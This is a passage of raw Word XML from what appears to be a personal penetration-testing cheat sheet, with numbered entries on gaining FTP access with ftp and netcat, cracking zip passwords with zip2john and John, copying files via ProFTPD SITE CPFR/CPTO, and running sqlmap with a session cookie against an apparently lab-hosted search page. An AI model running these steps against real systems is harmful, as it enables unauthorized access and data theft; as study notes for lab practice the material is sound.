            <w:r>
              <w:br/>
              <w:t>If there is an open port for file transfer protocol, we can try to gain access using:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00322D20">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>ftp</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00F47B6F">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>TARGET IP ADDRESS</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4D075B7A" w14:textId="77777777" w:rsidR="008261D4" w:rsidRPr="00557003" w:rsidRDefault="008261D4" w:rsidP="008261D4">
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00557003">
              <w:t>Or</w:t>
            </w:r>
            <w:r>
              <w:t>,</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00557003">
              <w:t xml:space="preserve"> we could </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">try </w:t>
            </w:r>
            <w:r w:rsidRPr="00557003">
              <w:t>us</w:t>
            </w:r>
            <w:r>
              <w:t>ing</w:t>
            </w:r>
            <w:r w:rsidRPr="00557003">
              <w:t xml:space="preserve"> netcat:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2E4D4744" w14:textId="77777777" w:rsidR="008261D4" w:rsidRDefault="008261D4" w:rsidP="008261D4">
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00557003">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve"> nc</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00557003">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve">TARGET IP ADDRESS </w:t>
            </w:r>
            <w:r w:rsidRPr="00557003">
              <w:rPr>
                <w:color w:val="92D050"/>
              </w:rPr>
              <w:t>PORT NUMBER</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008261D4" w14:paraId="2BA1AD5D" w14:textId="77777777" w:rsidTr="008261D4">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="3B7670D0" w14:textId="77777777" w:rsidR="008261D4" w:rsidRDefault="008261D4" w:rsidP="008261D4">
            <w:r>
              <w:t>79.h</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2394" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="CCFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="49D2A537" w14:textId="77777777" w:rsidR="008261D4" w:rsidRDefault="008261D4" w:rsidP="008261D4">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8022" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="31191E07" w14:textId="77777777" w:rsidR="008261D4" w:rsidRDefault="008261D4" w:rsidP="008261D4">
            <w:r>
              <w:t>If this works, it will ask for a name, here you can type in any usernames found. Be ready to insert a password too. If the password is misspelt, use ‘</w:t>
            </w:r>
            <w:r w:rsidRPr="00FC0116">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>user</w:t>
            </w:r>
            <w:r>
              <w:t>’ command within the ftp shell to re-enter the username and password. Once in, use ‘</w:t>
            </w:r>
            <w:r w:rsidRPr="007748B7">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>dir</w:t>
            </w:r>
            <w:r w:rsidRPr="007748B7">
              <w:t>’</w:t>
            </w:r>
            <w:r>
              <w:t>, ‘</w:t>
            </w:r>
            <w:r w:rsidRPr="007748B7">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>get</w:t>
            </w:r>
            <w:r>
              <w:t>’, ‘</w:t>
            </w:r>
            <w:r w:rsidRPr="007748B7">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>cat</w:t>
            </w:r>
            <w:r>
              <w:t>’, etc.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008261D4" w14:paraId="0DCE2DD1" w14:textId="77777777" w:rsidTr="008261D4">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="748492D0" w14:textId="77777777" w:rsidR="008261D4" w:rsidRDefault="008261D4" w:rsidP="008261D4">
            <w:r>
              <w:t>79.i</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2394" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="CCFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="1D012116" w14:textId="77777777" w:rsidR="008261D4" w:rsidRDefault="008261D4" w:rsidP="008261D4">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8022" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="4F5F15A5" w14:textId="77777777" w:rsidR="008261D4" w:rsidRDefault="008261D4" w:rsidP="008261D4">
            <w:r>
              <w:t>If a file seems to be password protected, and is a zipped file, this password may be cracked using John, the command will likely be:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00FC0116">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>zip2john</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00FC0116">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve">FILE_NAME.zip </w:t>
            </w:r>
            <w:r w:rsidRPr="00FC0116">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>&gt;</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>HASH</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="007748B7">
              <w:t>(</w:t>
            </w:r>
            <w:r w:rsidRPr="00FC0116">
              <w:t>Or any name you wish to give it.</w:t>
            </w:r>
            <w:r>
              <w:t>)</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t>From here, you can use john as you normally would.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008261D4" w14:paraId="2536E16A" w14:textId="77777777" w:rsidTr="008261D4">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="39C05A5B" w14:textId="77777777" w:rsidR="008261D4" w:rsidRDefault="008261D4" w:rsidP="008261D4">
            <w:r>
              <w:t>79.j</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2394" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="CCFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="23572E13" w14:textId="77777777" w:rsidR="008261D4" w:rsidRDefault="008261D4" w:rsidP="008261D4">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>ftp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8022" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="628F60A6" w14:textId="77777777" w:rsidR="008261D4" w:rsidRDefault="008261D4" w:rsidP="008261D4">
            <w:r>
              <w:t>If you are using ProFTPD, you can use these commands to copy a file form the share to another place:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="317BA0AA" w14:textId="77777777" w:rsidR="008261D4" w:rsidRDefault="008261D4" w:rsidP="008261D4">
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002B67C0">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>HELP</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>Displays commands</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002B67C0">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>QUIT</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>Exits the ftp</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6ECF63DC" w14:textId="77777777" w:rsidR="008261D4" w:rsidRDefault="008261D4" w:rsidP="008261D4">
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002B67C0">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>SITE CPFR</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="002B67C0">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>FILE</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>Tee a file to copy</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002B67C0">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>SITE CPTO</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="002B67C0">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>FILE</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>Paste the file</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008261D4" w14:paraId="5369734C" w14:textId="77777777" w:rsidTr="008261D4">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="457267F7" w14:textId="77777777" w:rsidR="008261D4" w:rsidRDefault="008261D4" w:rsidP="008261D4"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2394" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="CCFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="510B3B02" w14:textId="77777777" w:rsidR="008261D4" w:rsidRDefault="008261D4" w:rsidP="008261D4">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8022" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="36E3921F" w14:textId="77777777" w:rsidR="008261D4" w:rsidRDefault="008261D4" w:rsidP="008261D4"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5724674F" w14:textId="0F7901C1" w:rsidR="00701BF4" w:rsidRDefault="008261D4">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00701BF4">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="page" w:horzAnchor="margin" w:tblpY="935"/>
        <w:tblW w:w="11027" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="611"/>
        <w:gridCol w:w="2379"/>
        <w:gridCol w:w="8037"/>
      </w:tblGrid>
      <w:tr w:rsidR="000B6F98" w14:paraId="1BECC423" w14:textId="77777777" w:rsidTr="007118F6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="499" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="32E30651" w14:textId="683B08F3" w:rsidR="000B6F98" w:rsidRDefault="007118F6" w:rsidP="000B6F98">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>80</w:t>
            </w:r>
            <w:r w:rsidR="000B6F98">
              <w:t>.a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2415" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="CCFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="4A762798" w14:textId="77777777" w:rsidR="000B6F98" w:rsidRDefault="000B6F98" w:rsidP="000B6F98">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>sqlmap</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8113" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0ACF74A0" w14:textId="507E995D" w:rsidR="000B6F98" w:rsidRPr="00F85464" w:rsidRDefault="000B6F98" w:rsidP="000B6F98">
            <w:pPr>
              <w:rPr>
                <w:color w:val="7030A0"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002B38D7">
              <w:rPr>
                <w:color w:val="7030A0"/>
              </w:rPr>
              <w:t>IF USING A SEARCH BOX, OR OTHER TYPE OF USER INPUT BOX- CHECK FOR SQL.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="53B9D9FE" w14:textId="77777777" w:rsidR="000B6F98" w:rsidRDefault="000B6F98" w:rsidP="000B6F98">
            <w:r>
              <w:t>Often, sql search boxes can be abused by inputting and submitting commands, unless the website checks for these and filters them out.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000B6F98" w14:paraId="13B95E19" w14:textId="77777777" w:rsidTr="007118F6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="499" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="652D248A" w14:textId="1E17BDAF" w:rsidR="000B6F98" w:rsidRDefault="007118F6" w:rsidP="000B6F98">
            <w:r>
              <w:t>80</w:t>
            </w:r>
            <w:r w:rsidR="000B6F98">
              <w:t>.b</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2415" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="CCFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="0FDFBA52"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14FB9CC1" w14:textId="77777777" w:rsidR="000B6F98" w:rsidRDefault="000B6F98" w:rsidP="000B6F98">
            <w:r>
              <w:t>If you can return an error message when submitting a:    ‘   “   ;   #   -    or similar, then it is likely vulnerable to exploitation.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000B6F98" w14:paraId="1394921F" w14:textId="77777777" w:rsidTr="007118F6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="499" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="495BB195" w14:textId="5E5DA7B7" w:rsidR="000B6F98" w:rsidRDefault="007118F6" w:rsidP="000B6F98">
            <w:r>
              <w:t>80</w:t>
            </w:r>
            <w:r w:rsidR="000B6F98">
              <w:t>.c</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2415" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="CCFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="5DB88C6D"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0BF00FA3" w14:textId="77777777" w:rsidR="000B6F98" w:rsidRDefault="000B6F98" w:rsidP="000B6F98">
            <w:r>
              <w:t>If there is a chance to exploit this, then sqlmap can be used (check .d below).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000B6F98" w14:paraId="7D493A55" w14:textId="77777777" w:rsidTr="007118F6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="499" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="45B661B0" w14:textId="331EB951" w:rsidR="000B6F98" w:rsidRDefault="007118F6" w:rsidP="000B6F98">
            <w:r>
              <w:t>80</w:t>
            </w:r>
            <w:r w:rsidR="000B6F98">
              <w:t>.d</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2415" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="CCFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="00CE8026"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0D16D1CD" w14:textId="77777777" w:rsidR="000B6F98" w:rsidRDefault="000B6F98" w:rsidP="000B6F98">
            <w:r>
              <w:t>You will likely need to log into the website first using username and password credentials and then finding the php cookie name and value, then use:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3F7B6E74" w14:textId="77777777" w:rsidR="000B6F98" w:rsidRDefault="000B6F98" w:rsidP="000B6F98">
            <w:r>
              <w:tab/>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00176599">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">sqlmap </w:t>
            </w:r>
            <w:r w:rsidRPr="00176599">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-u</w:t>
            </w:r>
            <w:r w:rsidRPr="00176599">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve"> '</w:t>
            </w:r>
            <w:r w:rsidRPr="00176599">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>http://10.10.10.46/dashboard.php?search=a</w:t>
            </w:r>
            <w:r w:rsidRPr="00176599">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>'</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00176599">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>--cookie=</w:t>
            </w:r>
            <w:r w:rsidRPr="00176599">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>"</w:t>
            </w:r>
            <w:r w:rsidRPr="00176599">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>PHPSESSID</w:t>
            </w:r>
            <w:r w:rsidRPr="00176599">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>=</w:t>
            </w:r>
            <w:r w:rsidRPr="00176599">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>q555kou5g8vhcqk7jntl2bj696</w:t>
            </w:r>
            <w:r w:rsidRPr="00176599">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>"</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00176599">
              <w:t>(All one command)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000B6F98" w14:paraId="45C8EF4E" w14:textId="77777777" w:rsidTr="007118F6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="499" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="7D4FBD78" w14:textId="26BA485F" w:rsidR="000B6F98" w:rsidRDefault="007118F6" w:rsidP="000B6F98">
            <w:r>
              <w:t>80</w:t>
            </w:r>
            <w:r w:rsidR="000B6F98">
              <w:t>.e</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2415" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="CCFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="7724A8B0"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54687121" w14:textId="77777777" w:rsidR="000B6F98" w:rsidRDefault="000B6F98" w:rsidP="000B6F98">
            <w:r>
              <w:t>If you get a 302 redirect, that means a login credential is required which is probably stored in your cookies- check them. Use f12 and find the cookies probably in the ‘storage’, or similar, tab.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000B6F98" w14:paraId="1187027A" w14:textId="77777777" w:rsidTr="007118F6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="499" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="489167E4" w14:textId="5E578E9E" w:rsidR="000B6F98" w:rsidRDefault="007118F6" w:rsidP="000B6F98">
            <w:r>
              <w:t>80</w:t>
            </w:r>
            <w:r w:rsidR="000B6F98">
              <w:t>.f</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2415" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="CCFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="0D4B6688"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20A91493" w14:textId="685CF310" w:rsidR="000B6F98" w:rsidRDefault="000B6F98" w:rsidP="000B6F98">
            <w:r>
              <w:t xml:space="preserve">Once you’ve copied the cookie’s (probably named PHPSESSIONID, or similar) value from your web </w:t>
            </w:r>
            <w:r w:rsidR="00F85464">
              <w:t>browser</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> use the same command with your cookie and this flag:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="009B4108">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">sqlmap </w:t>
            </w:r>
            <w:r w:rsidRPr="009B4108">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>http://X.X.X.X/PAGETITLE.php?search=myquery</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="009B4108">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>--cookies=</w:t>
            </w:r>
            <w:r w:rsidRPr="00F97F7F">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>”</w:t>
            </w:r>
            <w:r w:rsidRPr="009B4108">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>COOKIENAME</w:t>
            </w:r>
            <w:r w:rsidRPr="00F97F7F">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>=</w:t>
            </w:r>
            <w:r w:rsidRPr="009B4108">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>COOKIEVALUENOGAPS</w:t>
            </w:r>
            <w:r w:rsidRPr="00F97F7F">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>”</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="009B4108">
              <w:rPr>
